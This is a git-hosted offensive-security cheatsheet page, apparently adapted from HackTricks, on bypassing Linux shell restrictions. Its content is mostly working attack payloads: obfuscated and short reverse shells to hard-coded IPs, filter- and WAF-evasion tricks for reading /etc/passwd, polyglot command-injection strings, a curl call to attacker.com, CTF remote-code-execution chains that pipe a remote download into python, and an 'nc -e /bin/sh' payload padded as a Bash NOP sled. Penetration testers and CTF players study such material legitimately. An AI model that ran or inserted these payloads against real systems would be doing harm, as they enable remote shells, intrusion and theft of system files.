daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

overview.md (13779B)


      1 ---
      2 title: "Bypass Linux Restrictions"
      3 section: "Linux"
      4 sectionSlug: "linux-hardening"
      5 sourcePath: "src/linux-hardening/linux-basics/bypass-linux-restrictions/README.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/linux-hardening/linux-basics/bypass-linux-restrictions/README.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: true
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Bypass Linux Restrictions
     14 
     15 ## Common Limitations Bypasses
     16 
     17 The command-injection and WAF-evasion collections in PayloadsAllTheThings, Bo0oM's cheat sheet, and the two linked Secjuice articles provide background for the shell-syntax variations in this section.<sup>[[1]](#references)[[2]](#references)[[3]](#references)[[4]](#references)</sup>
     18 
     19 ### Reverse Shell
     20 
     21 ```bash
     22 # Double-Base64 payload
     23 echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'
     24 # echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h
     25 ```
     26 
     27 ### Short Rev shell
     28 
     29 ```bash
     30 #Trick from Dikline
     31 #Get a rev shell with
     32 (sh)0>/dev/tcp/10.10.10.10/443
     33 #Then get the out of the rev shell executing inside of it:
     34 exec >&0
     35 ```
     36 
     37 ### Bypass Paths and forbidden words
     38 
     39 ```bash
     40 # Question mark binary substitution
     41 /usr/bin/p?ng # /usr/bin/ping
     42 nma? -p 80 localhost # /usr/bin/nmap -p 80 localhost
     43 
     44 # Wildcard(*) binary substitution
     45 /usr/bin/who*mi # /usr/bin/whoami
     46 
     47 # Wildcard + local directory arguments
     48 touch -- -la # -- stops processing options after the --
     49 ls *
     50 echo * #List current files and folders with echo and wildcard
     51 
     52 # [chars]
     53 /usr/bin/n[c] # /usr/bin/nc
     54 
     55 # Quotes
     56 'p'i'n'g # ping
     57 "w"h"o"a"m"i # whoami
     58 ech''o test # echo test
     59 ech""o test # echo test
     60 bas''e64 # base64
     61 
     62 #Backslashes
     63 \u\n\a\m\e \-\a # uname -a
     64 /\b\i\n/////s\h
     65 
     66 # $@
     67 who$@ami #whoami
     68 
     69 # Transformations (case, reverse, base64)
     70 $(tr "[A-Z]" "[a-z]"<<<"WhOaMi") #whoami -> Upper case to lower case
     71 $(a="WhOaMi";printf %s "${a,,}") #whoami -> transformation (only bash)
     72 $(rev<<<'imaohw') #whoami
     73 bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) #base64
     74 
     75 # Execution through $0
     76 echo whoami|$0
     77 
     78 # Uninitialized variables: A uninitialized variable equals to null (nothing)
     79 cat$u /etc$u/passwd$u # Use the uninitialized variable without {} before any symbol
     80 p${u}i${u}n${u}g # Equals to ping, use {} to put the uninitialized variables between valid characters
     81 
     82 # New lines
     83 p\
     84 i\
     85 n\
     86 g # These 4 lines will equal to ping
     87 
     88 # Fake commands
     89 p$(u)i$(u)n$(u)g # Equals to ping but 3 errors trying to execute "u" are shown
     90 w`u`h`u`o`u`a`u`m`u`i # Equals to whoami but 5 errors trying to execute "u" are shown
     91 
     92 # Concatenation of strings using history
     93 !-1 # This will be substitute by the last command executed, and !-2 by the penultimate command
     94 mi # This will throw an error
     95 whoa # This will throw an error
     96 !-1!-2 # This will execute whoami
     97 ```
     98 
     99 ### Bypass forbidden spaces
    100 
    101 ```bash
    102 # {form}
    103 {cat,lol.txt} # cat lol.txt
    104 {echo,test} # echo test
    105 
    106 # IFS - Internal field separator, change " " for any other character ("]" in this case)
    107 cat${IFS}/etc/passwd # cat /etc/passwd
    108 cat$IFS/etc/passwd # cat /etc/passwd
    109 
    110 # Put the command line in a variable and then execute it
    111 IFS=];b=wget]10.10.14.21:53/lol]-P]/tmp;$b
    112 IFS=];b=cat]/etc/passwd;$b # Using 2 ";"
    113 IFS=,;`cat<<<cat,/etc/passwd` # Using cat twice
    114 #  Other way, just change each space for ${IFS}
    115 echo${IFS}test
    116 
    117 # Using hex format
    118 X=$'cat\x20/etc/passwd'&&$X
    119 
    120 # Using tabs
    121 echo "ls\x09-l" | bash
    122 
    123 # Undefined variables and !
    124 $u $u # This will be saved in the history and can be used as a space, please notice that the $u variable is undefined
    125 uname!-1\-a # This equals to uname -a
    126 ```
    127 
    128 ### Bypass backslash and slash
    129 
    130 ```bash
    131 cat ${HOME:0:1}etc${HOME:0:1}passwd
    132 cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
    133 ```
    134 
    135 ### Bypass pipes
    136 
    137 ```bash
    138 bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
    139 ```
    140 
    141 ### Bypass with hex encoding
    142 
    143 ```bash
    144 echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
    145 cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
    146 abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat abc
    147 `echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
    148 cat `xxd -r -p <<< 2f6574632f706173737764`
    149 xxd -r -ps <(echo 2f6574632f706173737764)
    150 cat `xxd -r -ps <(echo 2f6574632f706173737764)`
    151 ```
    152 
    153 ### Bypass IPs
    154 
    155 ```bash
    156 # Decimal IPs
    157 127.0.0.1 == 2130706433
    158 ```
    159 
    160 ### Time based data exfiltration
    161 
    162 ```bash
    163 time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
    164 ```
    165 
    166 ### Getting chars from Env Variables
    167 
    168 ```bash
    169 echo ${LS_COLORS:10:1} #;
    170 echo ${PATH:0:1} #/
    171 ```
    172 
    173 ### DNS data exfiltration
    174 
    175 For out-of-band callbacks, a collaborator-style service such as Burp Collaborator can induce a target application to interact with an external server; the existing [**pingb**](http://pingb.in) link is retained as historical navigation, not a current availability claim.<sup>[[6]](#references)</sup>
    176 
    177 ### Builtins
    178 
    179 In a restricted shell, the available builtins are the remaining command surface for these examples; Bash documents its builtin commands and execution grammar.<sup>[[7]](#references)</sup> Idea from [**devploit**](https://twitter.com/devploit).\
    180 Start with the existing [**shell builtins**](https://www.gnu.org/software/bash/manual/html_node/Shell-Builtin-Commands.html) navigation, then try the following Bash-specific techniques:<sup>[[7]](#references)</sup>
    181 
    182 ```bash
    183 # Get list of builtins
    184 declare builtins
    185 
    186 # In these cases PATH won't be set, so you can try to set it
    187 PATH="/bin" /bin/ls
    188 export PATH="/bin"
    189 declare PATH="/bin"
    190 SHELL=/bin/bash
    191 
    192 # Hex
    193 $(echo -e "\x2f\x62\x69\x6e\x2f\x6c\x73")
    194 $(echo -e "\x2f\x62\x69\x6e\x2f\x6c\x73")
    195 
    196 # Input
    197 read aaa; exec $aaa #Read more commands to execute and execute them
    198 read aaa; eval $aaa
    199 
    200 # Get "/" char using printf and env vars
    201 printf %.1s "$PWD"
    202 ## Execute /bin/ls
    203 $(printf %.1s "$PWD")bin$(printf %.1s "$PWD")ls
    204 ## To get several letters you can use a combination of printf and
    205 declare
    206 declare functions
    207 declare historywords
    208 
    209 # Read flag in current dir
    210 source f*
    211 flag.txt:1: command not found: CTF{asdasdasd}
    212 
    213 # Read file with read
    214 while read -r line; do echo $line; done < /etc/passwd
    215 
    216 # Get env variables
    217 declare
    218 
    219 # Get history
    220 history
    221 declare history
    222 declare historywords
    223 
    224 # Disable special builtins chars so you can abuse them as scripts
    225 [ #[: ']' expected
    226 ## Disable "[" as builtin and enable it as script
    227 enable -n [
    228 echo -e '#!/bin/bash\necho "hello!"' > /tmp/[
    229 chmod +x [
    230 export PATH=/tmp:$PATH
    231 if [ "a" ]; then echo 1; fi # Will print hello!
    232 ```
    233 
    234 ### Polyglot command injection
    235 
    236 ```bash
    237 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
    238 /*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
    239 ```
    240 
    241 ### Bypass potential regexes
    242 
    243 ```bash
    244 # A regex that only allow letters and numbers might be vulnerable to new line characters
    245 1%0a`curl http://attacker.com`
    246 ```
    247 
    248 ### Bashfuscator
    249 
    250 The following invocation uses Bashfuscator, an open-source Bash obfuscation framework; the repository link in the code comment is retained as navigation.<sup>[[8]](#references)</sup>
    251 
    252 ```bash
    253 # From https://github.com/Bashfuscator/Bashfuscator
    254 ./bashfuscator -c 'cat /etc/passwd'
    255 ```
    256 
    257 ### RCE with 5 chars
    258 
    259 The following two historical 5-character examples are retained as challenge reproductions: the primary challenge repository is available at [Orange Tsai’s repository](https://github.com/orangetw/My-CTF-Web-Challenges), while the second write-up link in the code block is navigation whose current availability was not verified.<sup>[[9]](#references)</sup>
    260 
    261 ```bash
    262 # From the Orange Tsai BabyFirst Revenge challenge: https://github.com/orangetw/My-CTF-Web-Challenges#babyfirst-revenge
    263 #Orange Tsai solution
    264 ## Step 1: generate `ls -t>g` to file "_" to be able to execute ls ordening names by cration date
    265 http://host/?cmd=>ls\
    266 http://host/?cmd=ls>_
    267 http://host/?cmd=>\ \
    268 http://host/?cmd=>-t\
    269 http://host/?cmd=>\>g
    270 http://host/?cmd=ls>>_
    271 
    272 ## Step2: generate `curl orange.tw|python` to file "g"
    273 ## by creating the necesary filenames and writting that content to file "g" executing the previous generated file
    274 http://host/?cmd=>on
    275 http://host/?cmd=>th\
    276 http://host/?cmd=>py\
    277 http://host/?cmd=>\|\
    278 http://host/?cmd=>tw\
    279 http://host/?cmd=>e.\
    280 http://host/?cmd=>ng\
    281 http://host/?cmd=>ra\
    282 http://host/?cmd=>o\
    283 http://host/?cmd=>\ \
    284 http://host/?cmd=>rl\
    285 http://host/?cmd=>cu\
    286 http://host/?cmd=sh _
    287 # Note that a "\" char is added at the end of each filename because "ls" will add a new line between filenames whenwritting to the file
    288 
    289 ## Finally execute the file "g"
    290 http://host/?cmd=sh g
    291 
    292 
    293 # Another solution from https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/
    294 # Instead of writing scripts to a file, create an alphabetically ordered the command and execute it with "*"
    295 https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/
    296 ## Execute tar command over a folder
    297 http://52.199.204.34/?cmd=>tar
    298 http://52.199.204.34/?cmd=>zcf
    299 http://52.199.204.34/?cmd=>zzz
    300 http://52.199.204.34/?cmd=*%20/h*
    301 
    302 # Another curiosity if you can read files of the current folder
    303 ln /f*
    304 ## If there is a file /flag.txt that will create a hard link
    305 ## to it in the current folder
    306 ```
    307 
    308 ### RCE with 4 chars
    309 
    310 ```bash
    311 # In a similar fashion to the previous bypass this one just need 4 chars to execute commands
    312 # it will follow the same principle of creating the command `ls -t>g` in a file
    313 # and then generate the full command in filenames
    314 # generate "g> ht- sl" to file "v"
    315 '>dir'
    316 '>sl'
    317 '>g\>'
    318 '>ht-'
    319 '*>v'
    320 
    321 # reverse file "v" to file "x", content "ls -th >g"
    322 '>rev'
    323 '*v>x'
    324 
    325 # generate "curl orange.tw|python;"
    326 '>\;\\'
    327 '>on\\'
    328 '>th\\'
    329 '>py\\'
    330 '>\|\\'
    331 '>tw\\'
    332 '>e.\\'
    333 '>ng\\'
    334 '>ra\\'
    335 '>o\\'
    336 '>\ \\'
    337 '>rl\\'
    338 '>cu\\'
    339 
    340 # got shell
    341 'sh x'
    342 'sh g'
    343 ```
    344 
    345 ## Read-Only/Noexec/Distroless Bypass
    346 
    347 If you are inside a filesystem with **read-only and noexec protections**, or in a **distroless image**, the environment imposes execution constraints documented by Linux `mount(8)` and the Distroless project; the linked page collects techniques for working within them.<sup>[[11]](#references)[[12]](#references)</sup>
    348 
    349 [Bypass Fs Protections Read Only No Exec Distroless](/hacktricks/linux-hardening/linux-basics/bypass-linux-restrictions/bypass-fs-protections-read-only-no-exec-distroless/overview)
    350 
    351 ## Chroot & other Jails Bypass
    352 
    353 [Escaping From Limited Bash](/hacktricks/linux-hardening/main-system-information/escaping-from-limited-bash)
    354 
    355 ## Space-Based Bash NOP Sled ("Bashsledding")
    356 
    357 When a vulnerability lets you partially control an argument that ultimately reaches `system()` or another shell, the payload offset may be uncertain. Alan Cao and Will Tan describe a constrained embedded-device case where a shell payload was sprayed into memory-mapped NVRAM and prefixed with spaces.<sup>[[5]](#references)</sup>
    358 
    359 Therefore you can create a *NOP sled for Bash* by prefixing your real command with a long sequence of spaces or tab characters; Bash defines spaces and tabs as blanks that separate words in a simple command.<sup>[[5]](#references)[[7]](#references)</sup>
    360 
    361 ```bash
    362 # Payload sprayed into an environment variable / NVRAM entry
    363 "                nc -e /bin/sh 10.0.0.1 4444"
    364 # 16× spaces ───┘ ↑ real command
    365 ```
    366 
    367 If a ROP chain (or another memory-corruption primitive) passes a command-string pointer that begins anywhere within the space block, Bash can parse the remaining leading blanks until it reaches the command; in the cited router exploit, this made uncertain string offsets usable.<sup>[[5]](#references)[[7]](#references)</sup>
    368 
    369 Practical use cases in constrained embedded targets include:<sup>[[5]](#references)</sup>
    370 
    371 1. **Memory-mapped configuration blobs** (e.g. NVRAM) that are accessible across processes.<sup>[[5]](#references)</sup>
    372 2. Payload channels where the attacker cannot write NULL bytes to align the payload (a general adaptation of the alignment problem).<sup>[[5]](#references)</sup>
    373 3. Embedded devices with a small BusyBox `ash`/`sh` environment, which BusyBox documents as applets in resource-constrained systems.<sup>[[10]](#references)</sup>
    374 
    375 > 🛠️  Combine this technique with ROP gadgets that call `system()` in a controlled lab; the cited router research demonstrates this combination on constrained hardware.<sup>[[5]](#references)</sup>
    376 
    377 ## References
    378 
    379 - [1] [PayloadsAllTheThings - Command Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits)
    380 - [2] [Bo0oM - WAF-bypass-Cheat-Sheet](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet)
    381 - [3] [Web Application Firewall (WAF) Evasion Techniques #2 - theMiddle](https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0)
    382 - [4] [Web Application Firewall (WAF) Evasion Techniques #3 - theMiddle](https://www.secjuice.com/web-application-firewall-waf-evasion/)
    383 - [5] [Alan Cao and Will Tan — Exploiting zero days in abandoned hardware – Trail of Bits blog](https://blog.trailofbits.com/2025/07/25/exploiting-zero-days-in-abandoned-hardware/)
    384 - [6] [Burp Collaborator - PortSwigger](https://portswigger.net/burp/documentation/desktop/tools/collaborator)
    385 - [7] [bash(1) — Linux manual page](https://man7.org/linux/man-pages/man1/bash.1.html)
    386 - [8] [Bashfuscator](https://github.com/Bashfuscator/Bashfuscator)
    387 - [9] [My-CTF-Web-Challenges — Orange Tsai](https://github.com/orangetw/My-CTF-Web-Challenges)
    388 - [10] [BusyBox](https://busybox.net/downloads/BusyBox.html)
    389 - [11] [mount(8) — Linux manual page](https://man7.org/linux/man-pages/man8/mount.8.html)
    390 - [12] [Distroless](https://github.com/GoogleContainerTools/distroless)